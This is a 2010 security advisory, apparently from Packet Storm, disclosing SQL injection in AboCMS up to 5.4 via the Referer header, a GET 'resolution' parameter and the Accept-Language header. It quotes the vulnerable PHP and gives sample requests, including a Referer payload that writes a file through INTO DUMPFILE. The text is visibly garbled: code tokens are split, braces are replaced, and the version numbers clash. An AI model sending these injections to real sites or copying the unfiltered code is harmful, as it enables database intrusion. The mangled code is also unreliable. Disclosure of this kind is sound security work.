AboCMS 5.4 SQL Injection

2010-03-19T00:00:00
ID PACKETSTORM:87445
Type packetstorm
Reporter Vladimir Vorontsov
Modified 2010-03-19T00:00:00

Description

                                        
                                            `[ONSEC-10-003] AboCMS SQL inj  
Target: AboCMS <= 5.4 (fixpack unknown)  
Type: SQL инъекция  
Rist: Medium  
Find date: 12.03.2010  
Report date: 12.03.2010  
Fix date: 17.03.2010  
Author: Vladimir Vorontsov  
OnSec Russian Security Group (onsec [dot] ru)  
Original links: http://onsec.ru/vuln?id=19  
  
In the popular content management system AboCMS version 5.2 found a  
critical vulnerability. Errors allow an attacker to modify the query syntax  
to the database.  
It exists because of the lack of data filtering of HTTP headers and data  
in the request variables.   
  
1. Vulnerability in the header data HTTP Referer.   
  
Exploitation of vulnerability is possible when the option rewrite_mod  
settings management system. Vulnerable code:   
  
$ url_info = parse_url ($ _SERVER [ 'HTTP_REFERER']);   
if ($ CONFIG [ 'rewrite_mod']) (   
$ link = @ $ url_info [ 'path']? preg_replace ( "/ ^ \ / (rus | ukr | blr  
| de | frn | eng) \ /? / i", "", $ url_info [ 'path']): "";   
/ *   
$ amp_pos = strpos ($ link, "&");   
$ link = FALSE! == $ amp_pos? substr ($ link, 0, $ amp_pos): $ link;   
  
* /   
if ($ link =='/') $ link = null;   
$ by = 'address';   
) Else (   
$ link = array ();   
parse_str (@ $ url_info [ 'query'], $ link);   
$ link = (@ $ link [ 'link'] & & $ link [ 'link']!='/')? My_Sql::  
escape ($ link [ 'link']):'';   
$ by = 'link';   
)   
  
Implementation:   
  
  
GET http://localhost/c.php HTTP/1.1   
  
Referer: http://asd.asd/'/**/ INTO / ** / dumpfile /**/' C: / onsec.txt '   
  
  
2. Vulnerability in the variable data resolution request GET.   
  
  
Vulnerable code:   
  
if (@ $ _GET [ 'resolution']) (   
$ user_resolution = $ _GET [ 'resolution'];   
) Else (   
$ user_resolution = 'Another';   
)   
  
Implementation:   
  
  
GET http://localhost/c.php?resolution = "injection / ** / to / ** / insert  
  
  
  
3. Vulnerability in the header data HTTP Accept-Language   
  
  
Vulnerable code:   
  
$ user_lang = $ _SERVER [ 'HTTP_ACCEPT_LANGUAGE'];   
  
Implementation:   
  
  
GET http://localhost/c.php HTTP 1.1   
  
Accept-language: "injection / ** / to / ** / insert  
  
--   
Best regards,   
Vladimir Vorontsov  
ONsec security expert  
  
`